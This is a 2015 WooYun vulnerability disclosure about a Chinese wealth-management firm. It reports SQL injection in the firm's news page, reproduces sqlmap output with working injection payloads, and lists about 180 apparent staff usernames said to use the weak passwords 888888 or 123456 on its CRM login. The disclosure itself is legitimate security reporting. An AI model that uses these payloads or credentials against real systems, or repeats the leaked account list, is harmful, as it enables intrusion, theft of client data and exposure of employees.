当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133287

漏洞标题:新湖财富投资公司2平台漏洞可泄漏大量客户理财数据/大量员工密码泄露(个人信息、理财产品等)

相关厂商:新湖财富投资

漏洞作者: 路人甲

提交时间:2015-08-13 10:47

修复时间:2015-09-28 10:50

公开时间:2015-09-28 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

新湖财富投资公司2平台漏洞可泄漏大量客户理财数据/大量员工密码泄露(个人信息、理财产品等)

详细说明:

http://www.xinhucaifu.com/news.php?id=198
主站是个参数就能注入

[10:33:39] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=198) AND 8832=8832 AND (1107=1107
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=-7240) UNION ALL SELECT NULL,CONCAT(0x7167716871,0x4a4c7156656a41495666,0x716b676371),NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=198) AND SLEEP(5) AND (9760=9760
---
[10:33:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[10:33:49] [INFO] fetching database names
[10:33:50] [INFO] the SQL query used returns 2 entries
[10:33:50] [INFO] retrieved: "information_schema"
[10:33:50] [INFO] retrieved: "xinhucaifu"
available databases [2]:                                                                                               
[*] information_schema
[*] xinhucaifu


屏幕快照 2015-08-11 上午10.45.18.png


http://crm.xinhucaifu.com/login.jsp
crm大量弱口令

密码:888888
zhoudapeng
sunhongyu
zhangfan
hudie
lilimei
zhanghan
zhaoping
wangyu
daijiajie
denghaoxiang
fangjianzhao
houxiaokun
wangxiaomeng
xiaobing
zhaojinyu
chenghefeng
gexin
yuhongmei
zhangying
sunyitong
wangweijie
gaoxuefeng
gaomin
lifeifei
quning
yaojingchao
liuzhengchang
zhengxiaoyu
maoyiyuan
wangyu
bianjiang
lujun
wanghaikuo
houjue
wangwenge
wangzaixi
yangchangjiang
hujuanjuan
zhanghaifeng
weizizhu
yuelintao
liyanping
zhaohaifeng
liangxitong
quyuncai
caojingjiang
yuyi
yuyicheng
wangjifeng
fusili
xiemin
zhangaiqing
mengxiangyang
shengdawei
rentianxiang
wangzhijian
chengwan
langlinlin
mameixiu
zhangtingting
zhoufeng
mishan
yuxiaoting
lishidong
liufengjuan
cuihaixia
douyoufa
luoxiaojia
wangjiaxin
shiyafei
hexun
liqifang
liuliyan
xuguanglei
dailijiao
caixinying
liangxinwu
liuzexin
manzhaobin
songlingrui
haoxilong
jianghao
songzhao
suiyande
tianhongtao
huanglei
xiayouquan
lijunpeng
miaosainan
chihong
zhumu
zhanglili
yaopenglei
haomingqian
liusuxiang
liuxiaoping
mengdan
daijing
dongcunwei
guokepu
lierjin
liliming
liyaxun
liuxiaona
renwenyan
wanghui
xujian
liusicong
wenweihua
pengning
chenjianan
liguangwei
lijiaye
wangweifu
wangxiaoting
yuyanchao
zhangqin
cuinaiqi
guoyanqiang
liutieqiang
luohaitao
yinsujuan
heleilei
wangjingjing
liyuefeng
linxiumei
liuqian
louyuwei
zhanghuijia
gaotong
tangchunqing
wanghui
wangxiao
zhoulihui
zhuchanghong
jizhao
tianruining
wuhaichao
zhaoyongning
zhencuixia
dingxuancheng
huangxiangcheng
liwenlong
wuyue
chenjianfeng
louyufeng
shijiale
ruanchun
zhangqin
zhangxinlei
tengguoshuai
liuqi
chenqinyun
luhenglu
dingxingjun
liugao
liuyukai
shishien
tanghong
xiabin
liumingming
yuhong
wuyinyan
zhangmingyuan
jiaqiling
kong
liuyanhua
lizhaoxun
zhangdawei


密码:123456
tangliqiu
fanrong
shihongwei
panying
baixue
hanjiangang
yangbin
chenjiufei
liye
liuzhanying
sujiuhong
menglei


包括但不限于以上账号 请厂商自己再排查一下

屏幕快照 2015-08-11 上午10.44.07.png


屏幕快照 2015-08-11 上午10.44.22.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-14 10:48

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无